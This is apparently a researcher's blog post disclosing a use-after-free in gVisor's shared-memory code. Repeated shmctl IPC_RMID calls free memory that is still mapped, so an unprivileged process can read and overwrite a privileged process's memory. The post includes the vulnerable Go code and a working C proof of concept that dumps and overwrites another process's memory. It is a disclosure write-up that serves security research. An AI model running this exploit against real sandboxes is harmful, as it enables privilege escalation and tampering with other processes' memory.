Privilege Escalation in gVisor, Google's Container Sandbox

tl;dr gVisor is Google’s sandboxing technology for containers running less-than-fully-trusted code. It’s a Golang reimplementation of the Linux kernel that runs in userspace, intercepting container syscalls and limiting what touches the host kernel directly. I found an issue with gVisor’s shared memory implementation that allowed unprivileged processes in the sandbox to read and write the memory of other, more highly privileged processes in the sandbox, including those running as root.

[edit: Please note that this is not a sandbox escape; gaining root within gVisor does not give you access to the host machine. I encourage you to check out the gVisor README for more details!]

Here’s a video of me running a proof-of-concept that reads and overwrites some memory in an unrelated process (code at the end of the post):

Vulnerability

Mapped-after-free

gVisor uses reference counting for various parts of its internal memory management, and the bug allows us to lower the reference count of the “platform” memory backing a shmget shared memory region, even when we still have a mapping to it in our process’s virtual address space. The backing memory is then reclaimed and handed to another (potentially more privileged) process, where it can be used for something else. The bug is basically a use-after-free.

The problem stems from this code in sys_shm.go, which implements the shmctl syscall:

func Shmctl(t *kernel.Task, args arch.SyscallArguments) (uintptr, *kernel.SyscallControl, error) {
  id := args[0].Int()
  cmd := args[1].Int()
  buf := args[2].Pointer()
...
  switch cmd {
...
  case linux.IPC_RMID:
    segment.MarkDestroyed()
    return 0, nil, nil

segment.MarkDestroyed() unconditionally decreases the reference count of the shared memory object, which eventually decreases the reference count of the platform memory range itself in shm.go:

func (s *Shm) destroy() {
  s.registry.remove(s)
  s.p.Memory().DecRef(s.fr)
}

func (s *Shm) MarkDestroyed() {
  s.mu.Lock()
  defer s.mu.Unlock()
  // Prevent the segment from being found in the registry.
  s.key = linux.IPC_PRIVATE
  s.pendingDestruction = true
  // destroy() above will get called when the reference count goes negative
  s.DecRef() 
}

So if the platform memory region in the s.fr range has a reference count of 1, and we call shmctl(shmid, IPC_RMID, NULL) until we trigger the destruction of the Shm object, that backing memory can be reclaimed by the kernel for use by other processes.

The platform memory’s reference count is initialized to 1 when we initially create our shared memory object with shmget(), but it gets incremented to 2 when the memory is accessed and page-faulted in. So if you read or write to the mapped shared memory region before triggering the DecRef() bug, things become harder to exploit.

Here’s the proof-of-concept I put together for the video above, with comments explaining how it works:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/shm.h>
#include <unistd.h>

#define SHMKEY 1234567

#define SHMSIZE ((size_t) 4096)

int main()
{
  // Fork off a process that allocates a bunch of memory containing the string
  // 'OOPS', and that will exit if it ever finds an 'A' byte in that string
  // (indicating that the memory has been overwritten by another process)
  if (fork() == 0) {
    sleep(1);
    execl("/usr/bin/python3", "python", "-c", "x = 'OOPS'\n"
                                              "while True:\n\t"
                                                "x += 'OOPS'\n\t"
                                                "if 'A' in x:\n\t\t"
                                                  "print('\\n\\n***Other process: memory was overwritten***')\n\t\t"
                                                  "exit(0)\n", NULL);
    return 0;
  }

  // Create a readable, writable shared memory region
  int shmid = shmget(SHMKEY, SHMSIZE, IPC_CREAT | 0600);

  // Map that shared memory into our virtual address space
  volatile unsigned char *shmm = shmat(shmid, NULL, 0);

  printf("shmm addr: %p\n", shmm);
  printf("Decreasing refcount\n");

  // Trigger our bug by releasing the platform memory backing the shared memory
  shmctl(shmid, IPC_RMID, NULL);
  shmctl(shmid, IPC_RMID, NULL);

  // Give the Python process some time to use up memory
  sleep(2);

  printf("Allocation from another process:\n");

  // Print out some bytes from the page, which has probably been allocated to
  // the Python process's big string
  for (size_t i = 0; i < 200; i++) {
    if (i % 20 == 0) {
      printf("\n");
    }
    if (shmm[i] != 0) printf("\x1B[32m");
    printf("%02X ", shmm[i]);
    if (shmm[i] != 0) printf("\x1B[0m");
    fflush(stdout);
  }

  // Demonstrate that we can overwrite the other process's memory. The other
  // process should exit once it detects that we've overwritten part of the
  // string with 0x41
  memset((char *)shmm, 0x41, SHMSIZE);

  // Sleep for a couple seconds so that we don't instantly panic
  sleep(2);

  // When the process exits, the kernel will attempt to DecRef an object whose
  // refcount is already negative, so it panics.
  printf("\nTime to panic...\n");

  return 0;
}

Conclusion

gVisor is a well-written but incredibly ambitious project; reimplementing the Linux kernel is hard. I’ve been thinking about some ways that one could detect and mitigate against this class of bug. Perhaps when a memory region is DecRef()ed to 0, the kernel could check that it doesn’t exist in any process’s virtual address space. I’m not sure if that would be too expensive.